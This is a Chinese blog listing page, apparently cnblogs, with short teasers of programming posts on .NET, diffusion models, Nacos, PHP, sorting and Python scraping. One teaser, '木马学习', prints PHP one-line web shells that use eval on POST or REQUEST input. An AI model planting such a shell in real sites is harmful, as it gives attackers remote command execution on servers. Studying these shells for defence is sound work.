0

图文并茂手把手教你MAC运行.net项目(Visual Studio 配置c# .net环境 运行solution)

下载Visual Studio 点击这里直达官网 安装Visual Studio 开启项目(如果你有现成的项目) 如果没有现成的项目,可以参考下一个步骤进行测试哦 选择.sln 点击键盘F5,启动项目 观察Application Output, 项目启动成功 结语 今天就写到这里啦~ 小伙伴们,( ̄ ...

糖~豆豆 发布于 2024-04-20 02:47 评论(0) 阅读(0)
0

【Remix】拆解 DDIM 论文【扩散模型加速采样】

原文链接:[2010.02502] Denoising Diffusion Implicit Models (arxiv.org) 技术上,DDIM 提出 直接拿到训好的 DDPM 从 DDPM 的生成过程中删掉随机项 在此基础上大幅减少采样步数 理论上,DDIM 指出 DDPM 训练中使用的不同权 ...

nealchen 发布于 2024-04-20 02:27 评论(0) 阅读(1)
0

Google搜索技巧

来源:零度解说 附加:深度精简 Edge浏览器! 1、以图搜片 2、搜索特定文件类型 比如要搜索GPT-4来搜索相对应的PDF奇数文档,后面只需要跟上“文件类型 + :pdf” 通过这种方法可以搜索任何文档,只需要在某好后面加上文档后缀就可以了。 通过这种方法可以快速定位到我们需要的电影资源 3、通 ...

H_one 发布于 2024-04-20 02:19 评论(0) 阅读(1)
0

有用的C/C++的Windows操作

有用的C/C++的Windows操作 Windows.h库 示例 #include<stdio.h> #include<windows.h> void main() { printf("helloworld"); //第一个参数为0,表示依赖的窗口的编号,设为0就是系统弹出的;第二个参数是对话框的内 ...

Bolerat 发布于 2024-04-20 02:18 评论(0) 阅读(1)
0

4月19日

起床后发现浑身都疼,好像从健身开始每天都是这么虚了,这样也好吧,太痛的话就可以不去想那些杂七杂八的事。真的能不想吗?还是自己慢慢调整吧 ...

史常顺 发布于 2024-04-20 02:12 评论(0) 阅读(1)
0

木马学习

木马学习 一句话木马 案例(不免杀) php <?php @eval($_POST[cmd]);?> <?php @eval($_REQUEST[cmd]);?> asp <?php @eval($_POST[cmd]);?> <?php @eval($_REQUEST[cmd]);?> jsp < ...

Bolerat 发布于 2024-04-20 02:09 评论(0) 阅读(3)
0

Nacos的一些高级功能

高级功能 临时实例和持久实例 默认情况下,注册给Nacos的实例都是临时实例 临时实例:会通过客户端与服务器之间的心跳来保活,默认情况下客户端每隔5s发送一次心跳 public static final long DEFAULT_HEAT_BEAT_INTERVAL = TimeUnit.SECON ...

燕子去了 发布于 2024-04-20 02:04 评论(0) 阅读(1)
0

Windows 服务管理

创建服务 New-Service -Name NAME -BinaryPathName COMMAND -StartupType Automatic -Description DESCRIPTION 将 NAME 替换为服务的名称,将 COMMAND 替换为服务要运行的命令,将 DESCIPTION ...

Undefined443 发布于 2024-04-20 01:52 评论(0) 阅读(1)
0

重生之我在男航学Java-1

一、前言 第一次题目集主要是让我们熟悉对类的使用和对单一职责的理解,由于给出了设计建议,并且内部给出了具体的设计分析,第一次PTA的题量大但是难度并不是很大,虽然老师说了可以使用正则表达式,但我由于自身的懒惰附加c语言面向过程的思想根深蒂固,我在第一次PTA中并未使用正则表达式,导致我使用split ...

TCxiaoli 发布于 2024-04-20 01:46 评论(0) 阅读(2)
0

thinkphp不想查询某个字段

直接上代码 这样就不会查出来'aaaa,bbbb'两个字段了 $query = Db::name('table'); $data = $query->field('aaaa,bbbb', true)->select(); ...

79524795 发布于 2024-04-20 01:36 评论(0) 阅读(1)
0

PHP 安装开启redis扩展

方法1,通过pecl 安装 pecl install redis 方法2, 源码编译安装 github地址 https://github.com/phpredis/phpredis/blob/develop/INSTALL.md 也可以参考菜鸟教程 https://www.runoob.com/re ...

发奋图钱小菜鸡 发布于 2024-04-20 01:35 评论(0) 阅读(1)
0

一次失败的项目经历以及反省

本人于3.19开始了一个项目,大体是数据分析以及可视化展示,在24日结项的今日,成功的只做完了一个页面,项目期间饭没好好吃,游戏没好好打,觉没好好睡。 究其原因,总结如下: 1.放权放责:项目伊始,由于某些状况,在页面职责以及接口划分阶段,将该阶段交给另一个人打理,致使结构功能混乱。 2.队友选择盲 ...

子过杨梅 发布于 2024-04-20 01:33 评论(0) 阅读(1)
0

datawhale-动手学图深度学习task03

动手学图深度学习 声明:本文是在笔者的Pytorch tutorial及深度学习入门(鱼书)笔记的基础上继续学习记录,故有些内容略过。 第三章:深度学习基础 神经网络及其基本组成的补充 欠拟合: 训练误差和验证误差都很严重,而且他们间仅有一点差距,如果模型不能降低训练误差,这可能是因为模型过于简单( ...

LPF05 发布于 2024-04-20 01:31 评论(0) 阅读(1)
0

23201115-邓俊豪的第一次blog

目录PTA三次大作业前言关于难度和题目量关于知识点设计与分析第一次大作业题目我的代码分析报告第二次大作业题目我的代码分析报告第三次大作业题目我的代码分析报告采坑心得改进建议总结 PTA三次大作业 前言 关于难度和题目量 前三次大作业难度属于偏难水平,题目量也在可承受范围内 关于知识点 在这三次大作业 ...

醒着做梦~ 发布于 2024-04-20 01:27 评论(0) 阅读(2)
0

如何将 ASP.NET Core MVC 项目的视图分离到另一个项目

如何将 ASP.NET Core MVC 项目的视图分离到另一个项目 在当下这个年代 SPA 已是主流,人们早已忘记了 MVC 以及 Razor 的故事。但是在某些场景下 SSR 还是有意想不到效果。比如某些静态页面,比如追求首屏加载速度的时候。最近在项目中回归传统效果还是不错。 有的时候我们希望将 ...

Agile.Zhou 发布于 2024-04-20 01:21 评论(0) 阅读(12)
0

【备忘录】python中使用imageio插件和pillow插件生成favicon图标、ico文件,使用pyinstaller插件创建exe可执行文件

一、使用imageio插件和pillow插件生成favicon.ico 二、使用pyinstaller插件创建exe可执行文件 一、使用imageio插件和pillow插件生成favicon.ico python3.12.3环境下安装imageio插件、pillow插件: pip install i ...

刘增帅 发布于 2024-04-20 01:12 评论(0) 阅读(2)
0

解方程组的迭代法

解线性方程组的迭代法 1. 迭代法简介 对于一个线性方程组 \[\pmb{Ax} = \pmb{b}\tag 1 \label{1} \]其中,\(\pmb{A}\in \mathbb{R}^{n\times n}\),\(\pmb{b}\in \mathbb{R}^n\),\(\pmb{x}\in ...

数值分析小白 发布于 2024-04-20 01:07 评论(0) 阅读(6)
0

ps去除背景色或者如何将照片底色换成白色

ps如何将照片底色换成白色 - 知乎 (zhihu.com) ps将照片底色换成白色的方法:首先将图片拖入ps中,并点击【快速选择工具】图标;然后用鼠标将背景区域选中,并按住Shift键和【F5】键打开填充窗口;接着将内容这一项选择为【白色】;最后点击【确定】按钮即可。 ps将照片底色换成白色的方法 ...

一杯明月 发布于 2024-04-20 01:04 评论(0) 阅读(1)
0

常见的排序算法:冒泡、快排、归并

冒泡排序: 冒泡排序就像水里的气泡一样,轻的气泡会一点一点地浮到水面。在这个算法中,我们将待排序的元素比喻成气泡,通过比较相邻元素的值,让较大的元素慢慢“浮”到数组的末端。 具体步骤如下: 比较相邻的两个元素,如果前一个比后一个大(假设我们要从小到大排序),就交换它们的位置。 对每一对相邻元素做同样 ...

Yfeil 发布于 2024-04-20 01:00 评论(0) 阅读(1)
0

python 爬虫

python 爬虫 1.开发工具 pycharm: https://pan.baidu.com/s/1s_bkgDT0QxNTQY07LnQRWQ?pwd=2dlb提取码:2dlb python3 VSCode 2.第一个爬虫的开发 from urllib.request import urlope ...

落落的学习 发布于 2024-04-20 00:46 评论(0) 阅读(1)